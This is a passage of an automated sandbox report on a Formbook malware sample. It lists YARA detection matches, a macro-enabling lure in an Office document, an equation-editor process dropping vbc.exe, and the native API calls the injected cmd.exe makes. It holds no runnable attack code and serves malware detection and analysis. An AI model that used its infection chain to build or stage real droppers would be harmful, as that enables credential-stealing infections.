            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E18B0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E03E4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1BC2
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E04A8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E07C6
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0812
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1951
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9A50
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9CA9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9CB8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E2CF8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0D11
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00901B10
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C95A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C96E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D128
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C38D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BB9E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF8B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE0C6
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D005
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0090905A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F3040
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE2E9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00991238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008EF3CF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009163DB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F2305
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F7353
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0093A37B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00925485
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00901489
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0090C5F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F351F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F4680
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008FE6C1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00992622
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0097579A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC7BC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0098F8EE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC85C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0091286D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0099098E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F29B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009069FE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00975955
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A1238
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FE2E9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02202305
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0224A37B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02207353
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A63BF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FF3CF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022263DB
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0222D005
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02203040
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0221905A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FE0C6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A2622
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0224A634
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02204680
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220E6C1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220C7BC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228579A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022357C3
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228443E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0223D47D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02235485
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02211489
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220351F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02246540
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0221C5F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022B3A83
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02227B00
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022ACBA4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FFBD7
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228DBDA
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0222286D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220C85C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0229F8EE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228394B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02285955
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022029B2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A098E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022169FE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02232E2F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0221EE4C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02210F3F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0222DF7C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0229CFB1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02272FDC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02230D3B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220CD5B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0229FDDD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DD128
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DC38D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DC95A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DC96E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DBB9E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C8C90
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C2D90
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C2FB0
            Source: C:\Users\Public\vbc.exeCode function: String function: 0095F970 appears 49 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 0093373B appears 148 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00933F92 appears 66 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 008EDF5C appears 71 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0226F970 appears 84 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 021FDF5C appears 119 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 021FE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0224373B appears 245 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02243F92 appears 132 times
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004185F0 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004186A0 NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418720 NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418642 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041869D NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041871A NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004187CB NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E10D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0060 NtQuerySection,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E01D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1148 NtOpenThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF938 NtWriteFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
